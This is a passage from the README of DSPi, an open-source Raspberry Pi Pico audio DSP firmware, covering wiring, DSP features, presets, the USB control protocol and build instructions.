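A +6 dB band at 1 kHz boosts by exactly 6 dB at its center frequency while leaving DC and Nyquist untouched, which is why cascading ten such bands per channel composes predictably.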

* * *

## Hardware Setup

### Flashing the Firmware

1. Download the latest `DSPi.uf2` release for your board.
2. Hold the **BOOTSEL** button on your Pico while plugging it into your computer.
3. A drive named `RPI-RP2` (or `RP2350` on a Pico 2) will appear.
4. Drag and drop the `.uf2` file onto this drive.
5. The Pico will reboot and appear as a "Weeb Labs DSPi" audio device.
6. Download and launch the DSPi Console application to control the DSPi.

### Wiring Guide

**RP2350 (Pico 2) — up to 8 output pins:**

| Function | Pin | Connection |
| --- | --- | --- |
| **Output Slot 0** (Out 1-2) | `GPIO 6` (default) | S/PDIF or I2S data for main L/R or multi-way pair 1 |
| **Output Slot 1** (Out 3-4) | `GPIO 7` (default) | S/PDIF or I2S data for multi-way pair 2 |
| **Output Slot 2** (Out 5-6) | `GPIO 8` (default) | S/PDIF or I2S data for multi-way pair 3 |
| **Output Slot 3** (Out 7-8) | `GPIO 9` (default) | S/PDIF or I2S data for multi-way pair 4 |
| **Subwoofer Out** (PDM, Out 9) | `GPIO 10` (default) | Active subwoofer or PDM-to-analog filter |
| **I2S BCK** (shared, I2S only) | `GPIO 14` (default) | Bit clock for any slot configured as I2S |
| **I2S LRCLK** (I2S only) | `GPIO 15` (BCK + 1, fixed) | Word/frame clock; always BCK + 1 |
| **I2S MCK** (optional) | `GPIO 13` (default) | 128× or 256× Fs master clock when MCK is enabled |
| **USB** | `Micro-USB` | Host device (PC/Mac/Mobile Device) |

**RP2040 (Pico) — up to 6 output pins:**

| Function | Pin | Connection |
| --- | --- | --- |
| **Output Slot 0** (Out 1-2) | `GPIO 6` (default) | S/PDIF or I2S data for main L/R or stereo pair 1 |
| **Output Slot 1** (Out 3-4) | `GPIO 7` (default) | S/PDIF or I2S data for stereo pair 2 |
| **Subwoofer Out** (PDM, Out 5) | `GPIO 10` (default) | Active subwoofer or PDM-to-analog filter |
| **I2S BCK** (shared, I2S only) | `GPIO 14` (default) | Bit clock for any slot configured as I2S |
| **I2S LRCLK** (I2S only) | `GPIO 15` (BCK + 1, fixed) | Word/frame clock; always BCK + 1 |
| **I2S MCK** (optional) | `GPIO 13` (default) | 128× or 256× Fs master clock when MCK is enabled |
| **USB** | `Micro-USB` | Host device (PC/Mac/Mobile Device) |

> **Notes:** S/PDIF output requires either a Toshiba TX179 optical transmitter or a simple resistor divider. I2S output is a standard 24-bit-in-32-bit left-justified frame, so it wires straight into most I2S DACs. PDM output is a 1-bit logic signal that requires a resistor and capacitor to form a low-pass filter for conversion to analog audio.

### Custom Pin Assignments

All default pin assignments above work out of the box, but every output pin — including I2S BCK and MCK — can be reassigned at runtime through the DSPi Console application. No reflashing required. This is useful when designing custom PCBs or adapting to boards where the default GPIOs are inconvenient.

Pin assignments are saved to flash and restored automatically at boot. A few GPIOs are reserved and unavailable for output use: GPIO 12 (UART TX) and GPIOs 23-25 (power control and LED). LRCLK is always pinned to BCK + 1 due to a PIO side-set constraint.

[![Alt text](https://github.com/WeebLabs/DSPi/raw/main/Images/toslink.jpg)](https://github.com/WeebLabs/DSPi/blob/main/Images/toslink.jpg) [![Alt text](https://github.com/WeebLabs/DSPi/raw/main/Images/spdif_converter.jpg)](https://github.com/WeebLabs/DSPi/blob/main/Images/spdif_converter.jpg)

* * *

## DSP Features

### Matrix Mixer

The matrix mixer routes the USB stereo input to all output channels. RP2350 has a 2x9 matrix (9 outputs), RP2040 has a 2x5 matrix (5 outputs). Each crosspoint (input/output pair) has:

- **Enable/Disable:** Route active or inactive.
- **Gain:** -inf to +12 dB per crosspoint.
- **Phase Invert:** Polarity flip for driver alignment.

Each output channel also has:

- **Enable:** Disabled outputs skip all processing (EQ, delay, conversion) to save CPU.
- **Gain:** Per-output gain (-inf to +12 dB).
- **Mute:** Soft mute per output.
- **Delay:** Per-output time alignment.

**Output Availability:** Core 1 is shared between the PDM subwoofer modulator and the EQ worker that processes higher-numbered S/PDIF outputs. PDM and EQ worker modes are mutually exclusive:

**RP2350:**

| Mode | Available Outputs | Core 1 Usage |
| --- | --- | --- |
| **PDM enabled** (Out 9 on) | Out 1-2 (S/PDIF 1) + Out 9 (PDM) | Delta-sigma modulator |
| **PDM disabled** (Out 9 off) | Out 1-8 (S/PDIF 1-4) | EQ worker for Out 3-8 |

**RP2040:**

| Mode | Available Outputs | Core 1 Usage |
| --- | --- | --- |
| **PDM enabled** (Out 5 on) | Out 1-2 (S/PDIF 1) + Out 5 (PDM) | Delta-sigma modulator |
| **PDM disabled** (Out 5 off) | Out 1-4 (S/PDIF 1-2) | EQ worker for Out 3-4 |

When the PDM subwoofer is active, Core 1 is fully dedicated to the delta-sigma modulator, so higher-numbered S/PDIF outputs are unavailable. When PDM is off, Core 1 runs as an EQ worker processing those outputs in parallel with Core 0.

**Common Configurations (RP2350):**

| Use Case | Routing | Mode |
| --- | --- | --- |
| Stereo + Sub | L→Out1, R→Out2, L+R→Out9 | PDM on (3 outputs) |
| 2-Way Active | L→Out1(tweeter), L→Out3(woofer), R→Out2(tweeter), R→Out4(woofer) | PDM off (4 outputs) |
| 3-Way Active | As above, plus mid-range on Out5-6 | PDM off (6 outputs) |
| 4-Way Active | As above, plus super-tweeter on Out7-8 | PDM off (8 outputs) |

**Common Configurations (RP2040):**

| Use Case | Routing | Mode |
| --- | --- | --- |
| Stereo | L→Out1, R→Out2 | PDM off (2 outputs) |
| Stereo + Sub | L→Out1, R→Out2, L+R→Out5 | PDM on (3 outputs) |
| 2-Way Active | L→Out1(tweeter), L→Out3(woofer), R→Out2(tweeter), R→Out4(woofer) | PDM off (4 outputs) |

### Parametric Equalization

Each filter band supports 6 types:

| Type | Description |
| --- | --- |
| Flat | Bypass (no processing) |
| Peaking | Parametric bell filter |
| Low Shelf | Low-frequency shelf |
| High Shelf | High-frequency shelf |
| Low Pass | Low-pass filter |
| High Pass | High-pass filter |

On RP2040, all filters use biquad IIR (Transposed Direct Form II) with Q28 fixed-point arithmetic. On RP2350, the firmware uses a hybrid SVF/biquad architecture: filters below Fs/7.5 (~6.4 kHz at 48 kHz) use the Cytomic SVF (linear trapezoid) topology for superior numerical accuracy at low frequencies, while higher frequencies use traditional TDF2 biquad. All filters have configurable frequency, Q factor, and gain. Flat filters are automatically bypassed for zero CPU overhead.

**Channel Layout:**

**RP2350 (11 channels):**

| Channel | Index | EQ Bands |
| --- | --- | --- |
| Master Left | 0 | 10 |
| Master Right | 1 | 10 |
| Output 1-8 (S/PDIF) | 2-9 | 10 each |
| Output 9 (PDM Sub) | 10 | 10 |

**RP2040 (7 channels):**

| Channel | Index | EQ Bands |
| --- | --- | --- |
| Master Left | 0 | 10 |
| Master Right | 1 | 10 |
| Output 1-4 (S/PDIF) | 2-5 | 10 each |
| Output 5 (PDM Sub) | 6 | 10 |

### Loudness Compensation

Based on the ISO 226:2003 equal-loudness contour standard. At low listening volumes, the human ear is less sensitive to bass and treble frequencies. Loudness compensation applies a volume-dependent EQ curve to maintain perceived tonal balance across all listening levels.

- **Reference SPL:** Configurable (40-100 dB). Set this to the SPL where your system sounds tonally balanced at full volume.
- **Intensity:** Adjustable from 0-200% of the standard ISO curve.
- **Implementation:** Precomputed coefficient tables for all 91 volume steps, double-buffered for glitch-free updates.

### Headphone Crossfeed

Implements Bauer Stereophonic-to-Binaural (BS2B) crossfeed with a complementary filter design that reduces unnatural stereo separation for headphone listening. Each channel receives a lowpass-filtered, time-delayed mix of the opposite channel, simulating the acoustic crossfeed that occurs with loudspeaker listening.

- **Complementary Design:** Direct path = input - lowpass(input). Guarantees mono signals pass through at unity gain with no coloration.
- **Interaural Time Delay (ITD):** First-order all-pass filter adds ~220 µs of delay to the crossfeed path, modeling sound traveling around the head for 60-degree stereo speaker placement. ITD can be independently enabled/disabled.
- **Presets:**

| Preset | Cutoff | Feed Level | Character |
| --- | --- | --- | --- |
| Default | 700 Hz | 4.5 dB | Balanced, most popular |
| Chu Moy | 700 Hz | 6.0 dB | Stronger spatial effect |
| Jan Meier | 650 Hz | 9.5 dB | Subtle, natural |
| Custom | 500-2000 Hz | 0-15 dB | User-defined |

### Volume Leveller

A feedforward, stereo-linked, single-band RMS dynamic range compressor that maintains consistent perceived volume across content with varying loudness.

- **Upward compression:** Boosts content below the threshold while leaving content above the threshold completely untouched. No makeup gain needed.
- **RMS-based detection:** Tracks root-mean-square envelope, which correlates with perceived loudness better than peak detection.
- **Soft-knee:** Gradual transition between full boost and unity gain for transparent, artifact-free behavior.
- **Stereo-linked:** The louder of the two channels determines gain for both, preserving the stereo image.
- **Gain-reduction safety limiter:** -6 dBFS ceiling enforced via gain reduction (instant attack, 100 ms release) rather than hard clipping. Rarely engages since loud content passes through at unity.
- **Optional 10 ms lookahead** for smoother transitions.
- **Configurable:** speed (attack/release), max-gain ceiling (cap on how much quiet content can be lifted), and gate threshold (below which the leveller stops boosting to avoid amplifying silence/noise).

The leveller sits at PASS 2.5 — after Master EQ, before crossfeed. Independent of Loudness Compensation; both can be enabled together without conflict.

### Per-Channel Preamp

Each USB input channel (Left and Right) has an independent preamp gain in dB, applied at PASS 1 before any other processing. Useful for trimming channel imbalance, attenuating hot inputs ahead of EQ, or matching levels across sources. A legacy single-value command remains for backward compatibility (sets both channels to the same value).

### Master Volume

A device-side output ceiling applied at the very end of the signal chain, independent of USB host volume.

- **Range:** -128 to 0 dB. -128 is a sentinel for true silence (mute).
- **Independent of USB host volume:** the two multiply together. The host slider operates within whatever range master volume permits.
- **Independent of DSP processing:** loudness compensation, EQ, leveller, and crossfeed are all driven by the raw USB volume, not the master volume — their behavior is unchanged regardless of the master setting.
- **Two persistence modes** (selectable at runtime, persists across reboots):
  
  - **Mode 0 — Independent (default).** Master volume is a stand-alone device setting. The app calls a save command to capture the current value into the preset directory; that value is applied at every subsequent boot. Preset save/load do not touch master volume — switching presets never moves the volume.
  - **Mode 1 — With preset.** Master volume is part of each preset. Saved with the preset, restored on preset load, like any other DSP parameter. Useful when different presets target speaker setups with different sensitivity / maximum-output requirements.
- **Default at first boot:** -20 dB (configurable via `MASTER_VOL_DEFAULT_DB` in firmware).

### I2S Output

Each output slot can be switched at runtime between S/PDIF (default) and I2S, independently per slot. A single device can drive a mix — e.g., slot 0 as I2S into a DAC chip, slot 1 as S/PDIF over Toslink to an external receiver, all from the same audio pipeline.

- **I2S format:** 24-bit data, left-justified, MSB-first, 32-bit frames. Drop-in to most standard I2S DACs (PCM5102, ES9038Q2M, etc.).
- **Shared clocks:** All I2S slots share a single BCK/LRCLK pair. LRCLK is always BCK + 1 (PIO side-set hardware constraint).
- **Optional MCK:** When enabled, a 128× or 256× Fs master clock is generated on a configurable GPIO. Required by some DACs that don't have an internal PLL. At 96 kHz, only 128× is selectable due to PIO clock-divisor limits.
- **Sample-aligned start:** I2S slots can be brought up together so multiple DACs stay phase-locked.

The DSP pipeline is identical for both output types — only the final encoding differs (BMC/NRZI for S/PDIF vs. raw left-justified PCM for I2S).

### Subwoofer PDM Output

The subwoofer output uses a high-performance software-defined delta-sigma modulator running on Core 1.

- **Modulation:** 2nd-Order Delta-Sigma
- **Oversampling Ratio:** 256x (12.288 MHz bit clock at 48 kHz)
- **Dither:** TPDF (Triangular Probability Density Function) with noise shaping
- **DC Protection:** Leaky integrator design preventing DC offset accumulation

The objective was to use as much of Core 1 as necessary to produce an output clean enough for full-range use, even though it will typically only feed a subwoofer. The implementation is very stable, with no pops, clicks, or idle tones.

* * *

## User Presets

DSPi includes a 10-slot preset system that stores complete DSP configurations in flash. A preset is always active — there is no "no preset" state.

- **10 Preset Slots:** Each slot stores the full DSP state: per-channel preamp, EQ bands, delays, loudness, leveller, crossfeed, matrix mixer, output gains/mutes, output type (S/PDIF or I2S), I2S clock configuration, pin assignments, master volume (used in Mode 1), and per-channel names.
- **Per-Channel Names:** Each channel can be given a user-defined name (up to 31 characters) that is stored with the preset.
- **Startup Configuration:** Choose which preset loads on boot — either a specific default slot or whichever slot was last active.
- **Pin Config Inclusion:** Optionally include or exclude GPIO pin assignments when saving/loading presets (default: include — pin layout travels with the preset).
- **Master Volume Mode:** Selects whether master volume is part of each preset (Mode 1) or stored independently in the preset directory (Mode 0, default). See [Master Volume](#master-volume).
- **Preset-Switch Mute:** Audio output is briefly muted (~10 ms) during preset transitions to prevent audible glitches.
- **Legacy Commands:** The original save/load/reset commands (0x51-0x53) redirect through the preset system, operating on the currently active slot.
- **Bulk Parameter Transfer:** The complete DSP state can be read or written in a single USB control transfer (~2.9 KB) for fast synchronization with host applications.
- **Auto-Migration:** Older preset directories are upgraded transparently on first boot of new firmware — slot names, startup config, and other persisted state are preserved.

* * *

## Developer Reference

### System Architecture

- **Core 0:** USB communication, audio streaming, DSP processing (master EQ, crossfeed, loudness, matrix mixing, output EQ for S/PDIF pair 1), and control logic.
- **Core 1 (three modes):**
  
  - **PDM Mode:** Delta-sigma modulator for subwoofer output (when the PDM output is enabled).
  - **EQ Worker Mode:** Processes output EQ, delay, and S/PDIF conversion for higher-numbered outputs in parallel with Core 0. On RP2350: outputs 3-8. On RP2040: outputs 3-4. Activated when any of those outputs are enabled and PDM is disabled.
  - **Idle Mode:** When no outputs requiring Core 1 are enabled.
- **PIO & DMA:** Hardware offloading for S/PDIF encoding (PIO0) and PDM bitstream generation (PIO1) ensures zero CPU overhead for I/O.
- **Math Engine:**
  
  - **RP2040:** 32-bit fixed-point (Q28) processing with hand-optimized ARM assembly for the inner DSP loop.
  - **RP2350:** Single-precision float pipeline with hardware FPU. Hybrid SVF/biquad EQ — Cytomic SVF for low frequencies (below Fs/7.5), TDF2 biquad above. SVF provides superior numerical accuracy for low-frequency filters where biquad coefficient quantization becomes problematic.

> **Note:** PDM mode and EQ Worker mode are mutually exclusive on Core 1. When the PDM output is enabled, Core 0 handles all S/PDIF output EQ processing. When PDM is disabled and higher-numbered outputs are active, Core 1 runs as an EQ worker for those outputs.

### Performance Tuning

Both platforms run at a fixed 307.2 MHz system clock (VCO 1536 MHz / 5 / 1) so PIO dividers stay integer at every supported sample rate, eliminating sample-rate-dependent clock switching glitches.

| Platform | System Clock | Core Voltage |
| --- | --- | --- |
| **RP2040** | 307.2 MHz (overclock) | 1.15 V |
| **RP2350** | 307.2 MHz | 1.15 V |

The RP2040 reaches 307.2 MHz with a slight voltage bump above the 1.10 V nominal; the RP2350 is comfortable at the same voltage at this clock. The voltage step is applied before the frequency change. Sample rate changes do not retune the system clock, only the PIO dividers, so transitions between 44.1 / 48 / 96 kHz are seamless.

Flash access is also tuned: `PICO_FLASH_SPI_CLKDIV` is set to 6 to keep XIP and erase/program operations safely below the W25Q080's 104–133 MHz spec at this clock. On the RP2350, runtime QMI register management is handled by `firmware/DSPi/flash_clkdiv.c` since the bootrom does not honor the boot2 setting on that platform.

### USB Control Protocol

Configuration is performed via **Interface 2** (Vendor Interface) using Control Transfers under Windows and via **Interface 0** under macOS. The device supports WinUSB/WCID for automatic driverless installation on Windows.

**Request Table**

| Code | Name | Direction | Payload | Description |
| --- | --- | --- | --- | --- |
| `0x42` | `REQ_SET_EQ_PARAM` | OUT | 16 bytes | Upload filter parameters |
| `0x43` | `REQ_GET_EQ_PARAM` | IN | 16 bytes | Read filter parameters |
| `0x44` | `REQ_SET_PREAMP` | OUT | 4 bytes | Set global gain (float dB) |
| `0x45` | `REQ_GET_PREAMP` | IN | 4 bytes | Get global gain |
| `0x46` | `REQ_SET_BYPASS` | OUT | 1 byte | Bypass Master EQ (1=On, 0=Off) |
| `0x47` | `REQ_GET_BYPASS` | IN | 1 byte | Get bypass state |
| `0x48` | `REQ_SET_DELAY` | OUT | 4 bytes | Set channel delay (float ms) |
| `0x49` | `REQ_GET_DELAY` | IN | 4 bytes | Get channel delay |
| `0x50` | `REQ_GET_STATUS` | IN | 4-12 bytes | Get system statistics (wValue selects field) |
| `0x51` | `REQ_SAVE_PARAMS` | IN | 1 byte | Save to active preset slot |
| `0x52` | `REQ_LOAD_PARAMS` | IN | 1 byte | Reload active preset slot |
| `0x53` | `REQ_FACTORY_RESET` | IN | 1 byte | Reset live state to defaults |
| `0x54` | `REQ_SET_CHANNEL_GAIN` | OUT | 4 bytes | Set output channel gain (float dB) |
| `0x55` | `REQ_GET_CHANNEL_GAIN` | IN | 4 bytes | Get output channel gain |
| `0x56` | `REQ_SET_CHANNEL_MUTE` | OUT | 1 byte | Mute output channel (1=Muted) |
| `0x57` | `REQ_GET_CHANNEL_MUTE` | IN | 1 byte | Get mute state |
| `0x58` | `REQ_SET_LOUDNESS` | OUT | 1 byte | Enable/disable loudness (1=On) |
| `0x59` | `REQ_GET_LOUDNESS` | IN | 1 byte | Get loudness state |
| `0x5A` | `REQ_SET_LOUDNESS_REF` | OUT | 4 bytes | Set reference SPL (float, 40-100) |
| `0x5B` | `REQ_GET_LOUDNESS_REF` | IN | 4 bytes | Get reference SPL |
| `0x5C` | `REQ_SET_LOUDNESS_INTENSITY` | OUT | 4 bytes | Set intensity % (float, 0-200) |
| `0x5D` | `REQ_GET_LOUDNESS_INTENSITY` | IN | 4 bytes | Get intensity |
| `0x5E` | `REQ_SET_CROSSFEED` | OUT | 1 byte | Enable/disable crossfeed (1=On) |
| `0x5F` | `REQ_GET_CROSSFEED` | IN | 1 byte | Get crossfeed state |
| `0x60` | `REQ_SET_CROSSFEED_PRESET` | OUT | 1 byte | Set preset (0-3) |
| `0x61` | `REQ_GET_CROSSFEED_PRESET` | IN | 1 byte | Get current preset |
| `0x62` | `REQ_SET_CROSSFEED_FREQ` | OUT | 4 bytes | Set custom frequency (float Hz, 500-2000) |
| `0x63` | `REQ_GET_CROSSFEED_FREQ` | IN | 4 bytes | Get custom frequency |
| `0x64` | `REQ_SET_CROSSFEED_FEED` | OUT | 4 bytes | Set custom feed level (float dB, 0-15) |
| `0x65` | `REQ_GET_CROSSFEED_FEED` | IN | 4 bytes | Get custom feed level |
| `0x66` | `REQ_SET_CROSSFEED_ITD` | OUT | 1 byte | Enable/disable ITD (1=On) |
| `0x67` | `REQ_GET_CROSSFEED_ITD` | IN | 1 byte | Get ITD state |
| `0x70` | `REQ_SET_MATRIX_ROUTE` | OUT | 8 bytes | Set matrix crosspoint (MatrixRoutePacket) |
| `0x71` | `REQ_GET_MATRIX_ROUTE` | IN | 8 bytes | Get matrix crosspoint |
| `0x72` | `REQ_SET_OUTPUT_ENABLE` | OUT | 1 byte | Enable/disable output channel |
| `0x73` | `REQ_GET_OUTPUT_ENABLE` | IN | 1 byte | Get output enable state |
| `0x74` | `REQ_SET_OUTPUT_GAIN` | OUT | 4 bytes | Set per-output gain (float dB) |
| `0x75` | `REQ_GET_OUTPUT_GAIN` | IN | 4 bytes | Get per-output gain |
| `0x76` | `REQ_SET_OUTPUT_MUTE` | OUT | 1 byte | Mute output (1=Muted) |
| `0x77` | `REQ_GET_OUTPUT_MUTE` | IN | 1 byte | Get output mute state |
| `0x78` | `REQ_SET_OUTPUT_DELAY` | OUT | 4 bytes | Set per-output delay (float ms) |
| `0x79` | `REQ_GET_OUTPUT_DELAY` | IN | 4 bytes | Get per-output delay |
| `0x7A` | `REQ_GET_CORE1_MODE` | IN | 1 byte | Get Core 1 mode (0=Idle, 1=PDM, 2=EQ Worker) |
| `0x7B` | `REQ_GET_CORE1_CONFLICT` | IN | 1 byte | Check if PDM vs EQ Worker conflict exists |
| `0x7C` | `REQ_SET_OUTPUT_PIN` | IN | 1 byte | Change output GPIO pin (returns status) |
| `0x7D` | `REQ_GET_OUTPUT_PIN` | IN | 1 byte | Get current GPIO pin for an output |
| `0x7E` | `REQ_GET_SERIAL` | IN | variable | Get unique board serial number |
| `0x7F` | `REQ_GET_PLATFORM` | IN | 1 byte | Get platform ID (0=RP2040, 1=RP2350) |
| `0x83` | `REQ_CLEAR_CLIPS` | OUT | — | Clear clip detection latches |
| `0x90` | `REQ_PRESET_SAVE` | IN | 1 byte | Save live state to preset slot (wValue=slot) |
| `0x91` | `REQ_PRESET_LOAD` | IN | 1 byte | Load preset slot to live state (wValue=slot) |
| `0x92` | `REQ_PRESET_DELETE` | IN | 1 byte | Delete preset slot (wValue=slot) |
| `0x93` | `REQ_PRESET_GET_NAME` | IN | 32 bytes | Get preset name (wValue=slot) |
| `0x94` | `REQ_PRESET_SET_NAME` | OUT | 32 bytes | Set preset name (wValue=slot) |
| `0x95` | `REQ_PRESET_GET_DIR` | IN | variable | Get preset directory (occupancy, startup config) |
| `0x96` | `REQ_PRESET_SET_STARTUP` | OUT | 2 bytes | Set startup mode and default slot |
| `0x97` | `REQ_PRESET_GET_STARTUP` | IN | 2 bytes | Get startup configuration |
| `0x98` | `REQ_PRESET_SET_INCLUDE_PINS` | OUT | 1 byte | Set pin config inclusion (1=include) |
| `0x99` | `REQ_PRESET_GET_INCLUDE_PINS` | IN | 1 byte | Get pin config inclusion setting |
| `0x9A` | `REQ_PRESET_GET_ACTIVE` | IN | 1 byte | Get currently active preset slot index |
| `0x9B` | `REQ_SET_CHANNEL_NAME` | OUT | 32 bytes | Set channel name (wValue=channel) |
| `0x9C` | `REQ_GET_CHANNEL_NAME` | IN | 32 bytes | Get channel name (wValue=channel) |
| `0xA0` | `REQ_GET_ALL_PARAMS` | IN | ~2896 bytes | Bulk read entire DSP state (multi-packet) |
| `0xA1` | `REQ_SET_ALL_PARAMS` | OUT | ~2896 bytes | Bulk write entire DSP state (multi-packet) |
| `0xB0` | `REQ_GET_BUFFER_STATS` | IN | variable | Read buffer fill statistics |
| `0xB1` | `REQ_RESET_BUFFER_STATS` | IN | 1 byte | Reset buffer statistics counters |
| `0xB2` | `REQ_GET_USB_ERROR_STATS` | IN | 24 bytes | Read USB PHY error counters (CRC/bit-stuff/timeout/overflow/seq) |
| `0xB3` | `REQ_RESET_USB_ERROR_STATS` | IN | 1 byte | Reset USB PHY error counters |
| `0xB4` | `REQ_SET_LEVELLER_ENABLE` | OUT | 1 byte | Enable/disable Volume Leveller |
| `0xB5` | `REQ_GET_LEVELLER_ENABLE` | IN | 1 byte | Get leveller enable state |
| `0xB6` | `REQ_SET_LEVELLER_AMOUNT` | OUT | 4 bytes | Set leveller target/amount (float) |
| `0xB7` | `REQ_GET_LEVELLER_AMOUNT` | IN | 4 bytes | Get leveller amount |
| `0xB8` | `REQ_SET_LEVELLER_SPEED` | OUT | 1 byte | Set leveller attack/release speed |
| `0xB9` | `REQ_GET_LEVELLER_SPEED` | IN | 1 byte | Get leveller speed |
| `0xBA` | `REQ_SET_LEVELLER_MAX_GAIN` | OUT | 4 bytes | Set max upward gain (float dB) |
| `0xBB` | `REQ_GET_LEVELLER_MAX_GAIN` | IN | 4 bytes | Get max upward gain |
| `0xBC` | `REQ_SET_LEVELLER_LOOKAHEAD` | OUT | 1 byte | Enable/disable 10 ms lookahead |
| `0xBD` | `REQ_GET_LEVELLER_LOOKAHEAD` | IN | 1 byte | Get lookahead state |
| `0xBE` | `REQ_SET_LEVELLER_GATE` | OUT | 4 bytes | Set noise-gate threshold (float dB) |
| `0xBF` | `REQ_GET_LEVELLER_GATE` | IN | 4 bytes | Get noise-gate threshold |
| `0xC0` | `REQ_SET_OUTPUT_TYPE` | OUT | 1 byte | Set slot output type (0=S/PDIF, 1=I2S; wValue=slot) |
| `0xC1` | `REQ_GET_OUTPUT_TYPE` | IN | 1 byte | Get slot output type (wValue=slot) |
| `0xC2` | `REQ_SET_I2S_BCK_PIN` | OUT | 1 byte | Set shared I2S BCK GPIO (LRCLK auto = BCK + 1) |
| `0xC3` | `REQ_GET_I2S_BCK_PIN` | IN | 1 byte | Get current I2S BCK pin |
| `0xC4` | `REQ_SET_MCK_ENABLE` | OUT | 1 byte | Enable/disable I2S master clock output |
| `0xC5` | `REQ_GET_MCK_ENABLE` | IN | 1 byte | Get MCK enable state |
| `0xC6` | `REQ_SET_MCK_PIN` | OUT | 1 byte | Set MCK GPIO |
| `0xC7` | `REQ_GET_MCK_PIN` | IN | 1 byte | Get MCK GPIO |
| `0xC8` | `REQ_SET_MCK_MULTIPLIER` | OUT | 1 byte | Set MCK multiplier (0=128×, 1=256×) |
| `0xC9` | `REQ_GET_MCK_MULTIPLIER` | IN | 1 byte | Get MCK multiplier |
| `0xD0` | `REQ_SET_PREAMP_CH` | OUT | 4 bytes | Set per-channel preamp (wValue=channel, payload=float dB) |
| `0xD1` | `REQ_GET_PREAMP_CH` | IN | 4 bytes | Get per-channel preamp (wValue=channel) |
| `0xD2` | `REQ_SET_MASTER_VOLUME` | OUT | 4 bytes | Set master volume (-128 mute sentinel, -127..0 dB) |
| `0xD3` | `REQ_GET_MASTER_VOLUME` | IN | 4 bytes | Get current live master volume |
| `0xD4` | `REQ_SET_MASTER_VOLUME_MODE` | OUT | 1 byte | Set persistence mode (0=independent, 1=with preset) |
| `0xD5` | `REQ_GET_MASTER_VOLUME_MODE` | IN | 1 byte | Get persistence mode |
| `0xD6` | `REQ_SAVE_MASTER_VOLUME` | IN | 1 byte | Save live master volume to directory (mode 0 persistence) |
| `0xD7` | `REQ_GET_SAVED_MASTER_VOLUME` | IN | 4 bytes | Read directory's saved master-volume value |
| `0xF0` | `REQ_ENTER_BOOTLOADER` | IN | 1 byte | Reboot into UF2 bootloader for firmware update |

### REQ\_GET\_STATUS (0x50) - System Telemetry

The `REQ_GET_STATUS` request returns data based on the `wValue` field:

| wValue | Returns | Description |
| --- | --- | --- |
| `0` | uint32 | Peaks for channels 0-1 (packed 16-bit values) |
| `1` | uint32 | Peaks for channels 2-3 (packed 16-bit values) |
| `2` | uint32 | Peak for channel 4 + CPU0/CPU1 load (packed) |
| `3` | uint32 | PDM ring buffer overruns |
| `4` | uint32 | PDM ring buffer underruns |
| `5` | uint32 | PDM DMA overruns |
| `6` | uint32 | PDM DMA underruns |
| `7` | uint32 | S/PDIF overruns |
| `8` | uint32 | S/PDIF underruns |
| `9` | 12 bytes | Combined: all 5 peaks + CPU loads |
| `10` | uint32 | USB audio packet count |
| `11` | uint32 | USB alt setting |
| `12` | uint32 | USB audio mounted state |
| `13` | uint32 | System clock frequency (Hz) |
| `14` | uint32 | Core voltage (millivolts) |
| `15` | uint32 | Sample rate (Hz) |
| `16` | int32 | System temperature (centi-degrees C) |
| `17` | uint32 | Total S/PDIF DMA starvations (all slots combined) |
| `18` | uint32 | S/PDIF slot 0 starvations (Out 1-2) |
| `19` | uint32 | S/PDIF slot 1 starvations (Out 3-4) |
| `20` | uint32 | S/PDIF slot 2 starvations (Out 5-6, RP2350) |
| `21` | uint32 | S/PDIF slot 3 starvations (Out 7-8, RP2350) |

A starvation event means the S/PDIF DMA needed a buffer but the consumer pool was empty, so the firmware substituted a silence buffer for that transfer. This is a more direct output-side dropout signal than the older `spdif_underruns` USB-packet-gap heuristic.

### Data Structures

**Filter Packet (16 bytes):**

```
struct __attribute__((packed)) {
    uint8_t channel;  // RP2350: 0-10, RP2040: 0-6
    uint8_t band;     // 0-9
    uint8_t type;     // 0=Flat, 1=Peak, 2=LS, 3=HS, 4=LP, 5=HP
    uint8_t reserved;
    float freq;       // Hz
    float Q;
    float gain_db;
}
```

**Matrix Route Packet (8 bytes):**

```
struct __attribute__((packed)) {
    uint8_t input;          // 0-1 (USB L/R)
    uint8_t output;         // RP2350: 0-8, RP2040: 0-4
    uint8_t enabled;        // 0 or 1
    uint8_t phase_invert;   // 0 or 1
    float gain_db;          // -inf to +12dB
}
```

### Runtime Pin Configuration

Output GPIO pins can be reassigned at runtime without reflashing. This is useful for custom PCB layouts or when the default pin assignments conflict with other hardware.

**`REQ_SET_OUTPUT_PIN` (0x7C)** — IN transfer, returns 1-byte status:

- `wValue` = `(new_pin << 8) | output_index`
- RP2350: `output_index` 0-3 for S/PDIF outputs 1-4, 4 for PDM subwoofer
- RP2040: `output_index` 0-1 for S/PDIF outputs 1-2, 2 for PDM subwoofer
- S/PDIF outputs are automatically disabled and re-enabled during the pin change (~1ms audio dropout on that output only)
- PDM output must be disabled first (disable via `REQ_SET_OUTPUT_ENABLE`), otherwise returns `PIN_CONFIG_OUTPUT_ACTIVE`

| Status Code | Value | Meaning |
| --- | --- | --- |
| `PIN_CONFIG_SUCCESS` | 0x00 | Pin changed successfully |
| `PIN_CONFIG_INVALID_PIN` | 0x01 | Pin out of range or reserved (GPIO 12, 23-25) |
| `PIN_CONFIG_PIN_IN_USE` | 0x02 | Pin already assigned to another output |
| `PIN_CONFIG_INVALID_OUTPUT` | 0x03 | Output index out of range |
| `PIN_CONFIG_OUTPUT_ACTIVE` | 0x04 | PDM output must be disabled before changing its pin |

**`REQ_GET_OUTPUT_PIN` (0x7D)** — IN transfer, returns 1 byte:

- `wValue` = output\_index
- Returns the current GPIO pin number for that output

Pin assignments are stored in each preset and can optionally be included during preset save/load (controlled via `REQ_PRESET_SET_INCLUDE_PINS`).

* * *

## Building from Source

To build the firmware yourself, you'll need a standard Raspberry Pi Pico C/C++ development environment.

### 1. Install Prerequisites

Ensure you have the following tools installed:

- **CMake** (3.13 or newer)
- **Arm GNU Toolchain** (`arm-none-eabi-gcc`, etc.)
- **Python 3** (for Pico SDK scripts)
- **Git**

### 2. Clone the Repository

Clone the project recursively to include the Pico SDK and other submodules:

```
git clone --recursive https://github.com/WeebLabs/DSPi.git
cd DSPi
```

*If you already cloned without `--recursive`, run:*

```
git submodule update --init --recursive
```

### 3. Build the Firmware

You can build for either the standard **RP2040** (Raspberry Pi Pico) or the newer **RP2350** (Raspberry Pi Pico 2). The build system uses separate directories to avoid conflicts.

**Option A: Build for RP2040 (Standard Pico)**

```
mkdir build-rp2040
cd build-rp2040
cmake -DPICO_BOARD=pico -DPICO_EXTRAS_PATH=../firmware/pico-extras ../firmware
make
```

*Output:* `DSPi/DSPi.uf2`

